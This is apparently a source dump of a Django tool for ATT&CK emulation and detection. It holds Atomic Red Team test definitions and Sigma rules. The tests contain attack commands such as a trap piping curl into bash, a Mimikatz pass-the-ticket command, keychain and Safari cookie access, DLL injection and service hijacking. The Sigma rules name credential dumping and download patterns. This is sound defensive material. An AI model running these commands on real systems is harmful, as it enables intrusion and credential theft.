1 | --- 2 | attack_technique: T1150 3 | display_name: Plist Modification 4 | 5 | atomic_tests: 6 | - name: Plist Modification 7 | description: | 8 | Modify MacOS plist file in one of two directories 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | executor: 14 | name: manual 15 | steps: | 16 | 1. Modify a .plist in 17 | 18 | /Library/Preferences 19 | 20 | OR 21 | 22 | ~/Library/Preferences 23 | 24 | 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1196.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1196 3 | display_name: Control Panel Items 4 | 5 | atomic_tests: 6 | - name: Control Panel Items 7 | description: | 8 | This test simulates an adversary leveraging control.exe to execute a payload and pops calc 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | cpl_file_path: 15 | description: path to cpl file 16 | type: path 17 | default: calc.cpl 18 | 19 | executor: 20 | name: command_prompt 21 | elevation_required: false 22 | command: | 23 | control.exe #{cpl_file_path} 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_driver_load.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Driver Load from Temp 2 | id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 3 | description: Detects a driver load from a temporary directory 4 | author: Florian Roth 5 | tags: 6 | - attack.persistence 7 | - attack.t1050 8 | logsource: 9 | product: windows 10 | service: sysmon 11 | detection: 12 | selection: 13 | EventID: 6 14 | ImageLoaded: '*\Temp\\*' 15 | condition: selection 16 | falsepositives: 17 | - there is a relevant set of false positives depending on applications in the environment 18 | level: medium 19 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1009.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1009 3 | display_name: Binary Padding 4 | 5 | atomic_tests: 6 | - name: Pad Binary to Change Hash - Linux/macOS dd 7 | description: | 8 | Uses dd to add a zero to the binary to change the hash 9 | 10 | supported_platforms: 11 | - macos 12 | - linux 13 | input_arguments: 14 | file_to_pad: 15 | description: Path of binary to be padded 16 | type: Path 17 | default: /tmp/evil-binary 18 | executor: 19 | name: sh 20 | elevation_required: false 21 | command: | 22 | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} 23 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1127.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1127 3 | display_name: Trusted Developer Utilities 4 | atomic_tests: 5 | - name: MSBuild Bypass Using Inline Tasks 6 | description: | 7 | Executes the code in a project file using. C# Example 8 | supported_platforms: 9 | - windows 10 | input_arguments: 11 | filename: 12 | description: Location of the project file 13 | type: Path 14 | default: T1127.csproj 15 | executor: 16 | name: command_prompt 17 | elevation_required: false 18 | command: | 19 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} 20 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_taskmgr_localsystem.yml: -------------------------------------------------------------------------------- 1 | title: Taskmgr as LOCAL_SYSTEM 2 | id: 9fff585c-c33e-4a86-b3cd-39312079a65f 3 | status: experimental 4 | description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM 5 | tags: 6 | - attack.defense_evasion 7 | - attack.t1036 8 | author: Florian Roth 9 | date: 2018/03/18 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | selection: 15 | User: NT AUTHORITY\SYSTEM 16 | Image: '*\taskmgr.exe' 17 | condition: selection 18 | falsepositives: 19 | - Unkown 20 | level: high 21 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/proxy_cobalt_ocsp.yml: -------------------------------------------------------------------------------- 1 | title: CobaltStrike Malleable (OCSP) Profile 2 | id: 37325383-740a-403d-b1a2-b2b4ab7992e7 3 | status: experimental 4 | description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL 5 | references: 6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile 7 | author: Markus Neis 8 | tags: 9 | - attack.t1102 10 | logsource: 11 | category: proxy 12 | detection: 13 | selection: 14 | c-uri: '*/oscp/*' 15 | cs-host: 'ocsp.verisign.com' 16 | 17 | condition: selection 18 | falsepositives: 19 | - Unknown 20 | level: high 21 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1103.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1103 3 | display_name: AppInit DLLs 4 | 5 | atomic_tests: 6 | - name: Install AppInit Shim 7 | description: | 8 | AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system 9 | 10 | supported_platforms: 11 | - windows 12 | input_arguments: 13 | registry_file: 14 | description: Windows Registry File 15 | type: Path 16 | default: T1103.reg 17 | 18 | executor: 19 | name: command_prompt 20 | elevation_required: true 21 | command: | 22 | reg.exe import #{registry_file} 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_ghostpack_safetykatz.yml: -------------------------------------------------------------------------------- 1 | title: Detection of SafetyKatz 2 | id: e074832a-eada-4fd7-94a1-10642b130e16 3 | status: experimental 4 | description: Detects possible SafetyKatz Behaviour 5 | references: 6 | - https://github.com/GhostPack/SafetyKatz 7 | tags: 8 | - attack.credential_access 9 | - attack.t1003 10 | author: Markus Neis 11 | date: 2018/07/24 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 11 18 | TargetFilename: '*\Temp\debug.bin' 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1097.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1097 3 | display_name: Pass the Ticket 4 | 5 | atomic_tests: 6 | - name: Mimikatz Kerberos Ticket Attack 7 | description: | 8 | Similar to PTH, but attacking Kerberos 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | user_name: 15 | description: username 16 | type: string 17 | default: Administrator 18 | domain: 19 | description: domain 20 | type: string 21 | default: atomic.local 22 | 23 | executor: 24 | name: command_prompt 25 | command: | 26 | mimikatz # kerberos::ptt #{user_name}@#{domain} 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_outlook_temp.yml: -------------------------------------------------------------------------------- 1 | title: Execution in Outlook Temp Folder 2 | id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39 3 | status: experimental 4 | description: Detects a suspicious program execution in Outlook temp folder 5 | author: Florian Roth 6 | date: 2019/10/01 7 | tags: 8 | - attack.initial_access 9 | - attack.t1193 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | selection: 15 | Image: '*\Temporary Internet Files\Content.Outlook\\*' 16 | condition: selection 17 | fields: 18 | - CommandLine 19 | - ParentCommandLine 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_xor_commandline.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious XOR Encoded PowerShell Command Line 2 | id: bb780e0c-16cf-4383-8383-1e5471db6cf9 3 | description: Detects suspicious powershell process which includes bxor command, alternatvide obfuscation method to b64 encoded commands. 4 | status: experimental 5 | author: Sami Ruohonen 6 | date: 2018/09/05 7 | tags: 8 | - attack.execution 9 | - attack.t1086 10 | detection: 11 | selection: 12 | CommandLine: 13 | - '* -bxor*' 14 | condition: selection 15 | falsepositives: 16 | - unknown 17 | level: medium 18 | logsource: 19 | category: process_creation 20 | product: windows 21 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_suspicious_download.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious PowerShell Download 2 | id: 65531a81-a694-4e31-ae04-f8ba5bc33759 3 | status: experimental 4 | description: Detects suspicious PowerShell download command 5 | tags: 6 | - attack.execution 7 | - attack.t1086 8 | author: Florian Roth 9 | logsource: 10 | product: windows 11 | service: powershell 12 | detection: 13 | keywords: 14 | Message: 15 | - '*System.Net.WebClient).DownloadString(*' 16 | - '*system.net.webclient).downloadfile(*' 17 | condition: keywords 18 | falsepositives: 19 | - PowerShell scripts that download content from the Internet 20 | level: medium 21 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1005.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1005 3 | display_name: Data from Local System 4 | 5 | atomic_tests: 6 | - name: Search macOS Safari Cookies 7 | description: | 8 | This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | input_arguments: 14 | search_string: 15 | description: String to search Safari cookies to find. 16 | type: string 17 | default: coinbase 18 | 19 | executor: 20 | name: sh 21 | elevation_required: false 22 | command: | 23 | cd ~/Library/Cookies 24 | grep -q "#{search_string}" "Cookies.binarycookies" 25 | -------------------------------------------------------------------------------- /elemental/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Django's command-line utility for administrative tasks.""" 3 | import os 4 | import sys 5 | 6 | 7 | def main(): 8 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elemental.settings') 9 | try: 10 | from django.core.management import execute_from_command_line 11 | except ImportError as exc: 12 | raise ImportError( 13 | "Couldn't import Django. Are you sure it's installed and " 14 | "available on your PYTHONPATH environment variable? Did you " 15 | "forget to activate a virtual environment?" 16 | ) from exc 17 | execute_from_command_line(sys.argv) 18 | 19 | 20 | if __name__ == '__main__': 21 | main() 22 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_lethalhta.yml: -------------------------------------------------------------------------------- 1 | title: MSHTA spwaned by SVCHOST as seen in LethalHTA 2 | id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471 3 | status: experimental 4 | description: Detects MSHTA.EXE spwaned by SVCHOST described in report 5 | references: 6 | - https://codewhitesec.blogspot.com/2018/07/lethalhta.html 7 | tags: 8 | - attack.defense_evasion 9 | - attack.execution 10 | - attack.t1170 11 | author: Markus Neis 12 | date: 2018/06/07 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | ParentImage: '*\svchost.exe' 19 | Image: '*\mshta.exe' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_sam_dump.yml: -------------------------------------------------------------------------------- 1 | title: SAM Dump to AppData 2 | id: 839dd1e8-eda8-4834-8145-01beeee33acd 3 | status: experimental 4 | description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers 5 | tags: 6 | - attack.credential_access 7 | - attack.t1003 8 | author: Florian Roth 9 | logsource: 10 | product: windows 11 | service: system 12 | definition: The source of this type of event is Kernel-General 13 | detection: 14 | selection: 15 | EventID: 16 16 | keywords: 17 | Message: 18 | - '*\AppData\Local\Temp\SAM-*.dmp *' 19 | condition: all of them 20 | falsepositives: 21 | - Penetration testing 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_cloudhopper.yml: -------------------------------------------------------------------------------- 1 | title: WMIExec VBS Script 2 | id: 966e4016-627f-44f7-8341-f394905c361f 3 | description: Detects suspicious file execution by wscript and cscript 4 | author: Florian Roth 5 | references: 6 | - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf 7 | tags: 8 | - attack.execution 9 | - attack.g0045 10 | - attack.t1064 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | Image: '*\cscript.exe' 17 | CommandLine: '*.vbs /shell *' 18 | condition: selection 19 | fields: 20 | - CommandLine 21 | - ParentCommandLine 22 | falsepositives: 23 | - Unlikely 24 | level: critical 25 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/addnote.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | {% block content %} 3 |
4 |

Enter Notes for the Technique

5 |
6 | 7 |

{{ technique_id }}

8 | 9 | {% for note in tech_notes %} 10 | 
{{ note | safe }}
11 | {% endfor %} 12 | 13 |
14 | {% csrf_token %} 15 | 16 | 17 | 18 | 19 |
20 | 21 | {% endblock %} 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_encoded_frombase64string.yml: -------------------------------------------------------------------------------- 1 | title: Encoded FromBase64String 2 | id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c 3 | status: experimental 4 | description: Detects a base64 encoded FromBase64String keyword in a process command line 5 | author: Florian Roth 6 | date: 2019/08/24 7 | tags: 8 | - attack.t1086 9 | - attack.t1140 10 | - attack.execution 11 | - attack.defense_evasion 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine|base64offset|contains: '::FromBase64String' 18 | condition: selection 19 | fields: 20 | - CommandLine 21 | - ParentCommandLine 22 | falsepositives: 23 | - unknown 24 | level: critical 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_ntdsutil.yml: -------------------------------------------------------------------------------- 1 | title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) 2 | id: 2afafd61-6aae-4df4-baed-139fa1f4c345 3 | description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) 4 | status: experimental 5 | references: 6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm 7 | author: Thomas Patzke 8 | tags: 9 | - attack.credential_access 10 | - attack.t1003 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | CommandLine: '*\ntdsutil*' 17 | condition: selection 18 | falsepositives: 19 | - NTDS maintenance 20 | level: high 21 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_rasdial_activity.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious RASdial Activity 2 | id: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e 3 | description: Detects suspicious process related to rasdial.exe 4 | status: experimental 5 | references: 6 | - https://twitter.com/subTee/status/891298217907830785 7 | author: juju4 8 | tags: 9 | - attack.defense_evasion 10 | - attack.execution 11 | - attack.t1064 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - rasdial 19 | condition: selection 20 | falsepositives: 21 | - False positives depend on scripts and administrative tools used in the monitored environment 22 | level: medium 23 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1142.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1142 3 | display_name: Keychain 4 | 5 | atomic_tests: 6 | - name: Keychain 7 | description: | 8 | ### Keychain Files 9 | 10 | ~/Library/Keychains/ 11 | 12 | /Library/Keychains/ 13 | 14 | /Network/Library/Keychains/ 15 | 16 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) 17 | 18 | [Keychain dumper](https://github.com/juuso/keychaindump) 19 | 20 | 21 | supported_platforms: 22 | - macos 23 | 24 | executor: 25 | name: sh 26 | command: | 27 | security -h 28 | security find-certificate -a -p > allcerts.pem 29 | security import /tmp/certs.pem -k 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/proxy_cobalt_onedrive.yml: -------------------------------------------------------------------------------- 1 | title: CobaltStrike Malleable OneDrive browsing traffic profile 2 | id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc 3 | status: experimental 4 | description: Detects Malleable OneDrive Profile 5 | references: 6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile 7 | author: Markus Neis 8 | tags: 9 | - attack.t1102 10 | logsource: 11 | category: proxy 12 | detection: 13 | selection: 14 | cs-method: 'GET' 15 | c-uri: '*?manifest=wac' 16 | cs-host: 'onedrive.live.com' 17 | filter: 18 | c-uri: 'http*://onedrive.live.com/*' 19 | condition: selection and not filter 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_admin_share_access.yml: -------------------------------------------------------------------------------- 1 | title: Access to ADMIN$ Share 2 | id: 098d7118-55bc-4912-a836-dc6483a8d150 3 | description: Detects access to $ADMIN share 4 | tags: 5 | - attack.lateral_movement 6 | - attack.t1077 7 | status: experimental 8 | author: Florian Roth 9 | logsource: 10 | product: windows 11 | service: security 12 | definition: 'The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure' 13 | detection: 14 | selection: 15 | EventID: 5140 16 | ShareName: Admin$ 17 | filter: 18 | SubjectUserName: '*$' 19 | condition: selection and not filter 20 | falsepositives: 21 | - Legitimate administrative activity 22 | level: low 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_lsass_dump.yml: -------------------------------------------------------------------------------- 1 | title: Password Dumper Activity on LSASS 2 | id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c 3 | description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN 4 | status: experimental 5 | references: 6 | - https://twitter.com/jackcr/status/807385668833968128 7 | tags: 8 | - attack.credential_access 9 | - attack.t1003 10 | logsource: 11 | product: windows 12 | service: security 13 | detection: 14 | selection: 15 | EventID: 4656 16 | ProcessName: 'C:\Windows\System32\lsass.exe' 17 | AccessMask: '0x705' 18 | ObjectType: 'SAM_DOMAIN' 19 | condition: selection 20 | falsepositives: 21 | - Unkown 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_wmi_event_subscription.yml: -------------------------------------------------------------------------------- 1 | title: WMI Event Subscription 2 | id: 0f06a3a5-6a09-413f-8743-e6cf35561297 3 | status: experimental 4 | description: Detects creation of WMI event subscription persistence method 5 | references: 6 | - https://attack.mitre.org/techniques/T1084/ 7 | tags: 8 | - attack.t1084 9 | - attack.persistence 10 | author: Tom Ueltschi (@c_APT_ure) 11 | date: 2019/01/12 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selector: 17 | EventID: 18 | - 19 19 | - 20 20 | - 21 21 | condition: selector 22 | falsepositives: 23 | - exclude legitimate (vetted) use of WMI event subscription in your network 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rare_schtask_creation.yml: -------------------------------------------------------------------------------- 1 | title: Rare Scheduled Task Creations 2 | id: b20f6158-9438-41be-83da-a5a16ac90c2b 3 | status: experimental 4 | description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count 5 | function selects tasks with rare names. 6 | tags: 7 | - attack.persistence 8 | - attack.t1053 9 | - attack.s0111 10 | author: Florian Roth 11 | logsource: 12 | product: windows 13 | service: taskscheduler 14 | detection: 15 | selection: 16 | EventID: 106 17 | timeframe: 7d 18 | condition: selection | count() by TaskName < 5 19 | falsepositives: 20 | - Software installation 21 | level: low 22 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_ta17_293a_ps.yml: -------------------------------------------------------------------------------- 1 | title: Ps.exe Renamed SysInternals Tool 2 | id: 18da1007-3f26-470f-875d-f77faf1cab31 3 | description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report 4 | references: 5 | - https://www.us-cert.gov/ncas/alerts/TA17-293A 6 | tags: 7 | - attack.defense_evasion 8 | - attack.g0035 9 | - attack.t1036 10 | - car.2013-05-009 11 | author: Florian Roth 12 | date: 2017/10/22 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | CommandLine: 'ps.exe -accepteula' 19 | condition: selection 20 | falsepositives: 21 | - Renamed SysInternals tool 22 | level: high -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_turla_service_png.yml: -------------------------------------------------------------------------------- 1 | title: Turla PNG Dropper Service 2 | id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1 3 | description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 4 | references: 5 | - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ 6 | author: Florian Roth 7 | date: 2018/11/23 8 | tags: 9 | - attack.persistence 10 | - attack.g0010 11 | - attack.t1050 12 | logsource: 13 | product: windows 14 | service: system 15 | detection: 16 | selection: 17 | EventID: 7045 18 | ServiceName: 'WerFaultSvc' 19 | condition: selection 20 | falsepositives: 21 | - unlikely 22 | level: critical 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/lnx_auditd_web_rce.yml: -------------------------------------------------------------------------------- 1 | title: Webshell Remote Command Execution 2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222 3 | status: experimental 4 | description: Detects posible command execution by web application/web shell 5 | tags: 6 | - attack.persistence 7 | - attack.t1100 8 | references: 9 | - personal experience 10 | author: Ilyas Ochkov, Beyu Denis, oscd.community 11 | date: 2019/10/12 12 | modified: 2019/11/04 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'SYSCALL' 19 | SYSCALL: 'execve' 20 | key: 'detect_execve_www' 21 | condition: selection 22 | falsepositives: 23 | - Admin activity 24 | - Crazy web applications 25 | level: critical 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_quarkspw_filedump.yml: -------------------------------------------------------------------------------- 1 | title: QuarksPwDump Dump File 2 | id: 847def9e-924d-4e90-b7c4-5f581395a2b4 3 | status: experimental 4 | description: Detects a dump file written by QuarksPwDump password dumper 5 | references: 6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm 7 | author: Florian Roth 8 | date: 2018/02/10 9 | tags: 10 | - attack.credential_access 11 | - attack.t1003 12 | level: critical 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | detection: 17 | selection: 18 | # Sysmon: File Creation (ID 11) 19 | EventID: 11 20 | TargetFilename: '*\AppData\Local\Temp\SAM-*.dmp*' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_encoded_iex.yml: -------------------------------------------------------------------------------- 1 | title: Encoded IEX 2 | id: 88f680b8-070e-402c-ae11-d2914f2257f1 3 | status: experimental 4 | description: Detects a base64 encoded IEX command string in a process command line 5 | author: Florian Roth 6 | date: 2019/08/23 7 | tags: 8 | - attack.t1086 9 | - attack.t1140 10 | - attack.execution 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | CommandLine|base64offset|contains: 17 | - 'IEX ([' 18 | - 'iex ([' 19 | - 'iex (New' 20 | - 'IEX (New' 21 | condition: selection 22 | fields: 23 | - CommandLine 24 | - ParentCommandLine 25 | falsepositives: 26 | - unknown 27 | level: critical 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_carbonpaper_turla.yml: -------------------------------------------------------------------------------- 1 | title: Turla Service Install 2 | id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4 3 | description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET 4 | references: 5 | - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ 6 | tags: 7 | - attack.persistence 8 | - attack.g0010 9 | - attack.t1050 10 | logsource: 11 | product: windows 12 | service: system 13 | detection: 14 | selection: 15 | EventID: 7045 16 | ServiceName: 17 | - 'srservice' 18 | - 'ipvpn' 19 | - 'hkmsvc' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_psattack.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell PSAttack 2 | id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5 3 | status: experimental 4 | description: Detects the use of PSAttack PowerShell hack tool 5 | references: 6 | - https://adsecurity.org/?p=2921 7 | tags: 8 | - attack.execution 9 | - attack.t1086 10 | author: Sean Metcalf (source), Florian Roth (rule) 11 | logsource: 12 | product: windows 13 | service: powershell 14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' 15 | detection: 16 | selection: 17 | EventID: 4103 18 | keyword: 19 | - 'PS ATTACK!!!' 20 | condition: all of them 21 | falsepositives: 22 | - Pentesters 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1031.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1031 3 | display_name: Modify Existing Service 4 | 5 | atomic_tests: 6 | - name: Modify Fax service to run PowerShell 7 | description: | 8 | This test will temporarily modify the service Fax by changing the binPath to PowerShell 9 | and will then revert the binPath change, restoring Fax to its original state. 10 | 11 | supported_platforms: 12 | - windows 13 | 14 | executor: 15 | name: command_prompt 16 | elevation_required: true 17 | command: | 18 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" 19 | sc start Fax 20 | cleanup_command: 21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" 22 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1154.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1154 3 | display_name: Trap 4 | 5 | atomic_tests: 6 | - name: Trap 7 | description: | 8 | After exiting the shell, the script will download and execute. 9 | 10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute. 11 | 12 | supported_platforms: 13 | - macos 14 | - centos 15 | - ubuntu 16 | - linux 17 | 18 | executor: 19 | name: sh 20 | command: | 21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT 22 | exit 23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_wmi_persistence_script_event_consumer_write.yml: -------------------------------------------------------------------------------- 1 | title: WMI Persistence - Script Event Consumer File Write 2 | id: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4 3 | status: experimental 4 | description: Detects file writes of WMI script event consumer 5 | references: 6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ 7 | author: Thomas Patzke 8 | date: 2018/03/07 9 | tags: 10 | - attack.t1084 11 | - attack.persistence 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 11 18 | Image: 'C:\WINDOWS\system32\wbem\scrcons.exe' 19 | condition: selection 20 | falsepositives: 21 | - Unknown (data set is too small; further testing needed) 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_wmi_backdoor_exchange_transport_agent.yml: -------------------------------------------------------------------------------- 1 | title: WMI Backdoor Exchange Transport Agent 2 | id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b 3 | status: experimental 4 | description: Detects a WMi backdoor in Exchange Transport Agents via WMi event filters 5 | author: Florian Roth 6 | date: 2019/10/11 7 | references: 8 | - https://twitter.com/cglyer/status/1182389676876980224 9 | - https://twitter.com/cglyer/status/1182391019633029120 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | tags: 14 | - attack.persistence 15 | - attack.t1084 16 | detection: 17 | selection: 18 | ParentImage: '*\EdgeTransport.exe' 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: critical 23 | 24 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1179.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1179 3 | display_name: Hooking 4 | 5 | atomic_tests: 6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages 7 | description: | 8 | Hooks functions in PowerShell to read TLS Communications 9 | supported_platforms: 10 | - windows 11 | input_arguments: 12 | file_name: 13 | description: Dll To Inject 14 | type: Path 15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll 16 | server_name: 17 | description: TLS Server To Test Get Request 18 | type: Url 19 | default: https://www.example.com 20 | executor: 21 | name: powershell 22 | elevation_required: true 23 | command: | 24 | mavinject $pid /INJECTRUNNING #{file_name} 25 | curl #{server_name} 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_security_eventlog_cleared.yml: -------------------------------------------------------------------------------- 1 | title: Security Eventlog Cleared 2 | id: f2f01843-e7b8-4f95-a35a-d23584476423 3 | description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities 4 | tags: 5 | - attack.defense_evasion 6 | - attack.t1070 7 | - car.2016-04-002 8 | author: Florian Roth 9 | logsource: 10 | product: windows 11 | service: security 12 | detection: 13 | selection: 14 | EventID: 15 | - 517 16 | - 1102 17 | condition: selection 18 | falsepositives: 19 | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) 20 | - System provisioning (system reset before the golden image creation) 21 | level: high 22 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_wmi_persistence_script_event_consumer.yml: -------------------------------------------------------------------------------- 1 | title: WMI Persistence - Script Event Consumer 2 | id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e 3 | status: experimental 4 | description: Detects WMI script event consumers 5 | references: 6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ 7 | author: Thomas Patzke 8 | date: 2018/03/07 9 | tags: 10 | - attack.execution 11 | - attack.persistence 12 | - attack.t1047 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | Image: C:\WINDOWS\system32\wbem\scrcons.exe 19 | ParentImage: C:\Windows\System32\svchost.exe 20 | condition: selection 21 | falsepositives: 22 | - Legitimate event consumers 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_stonedrill.yml: -------------------------------------------------------------------------------- 1 | title: StoneDrill Service Install 2 | id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 3 | description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in 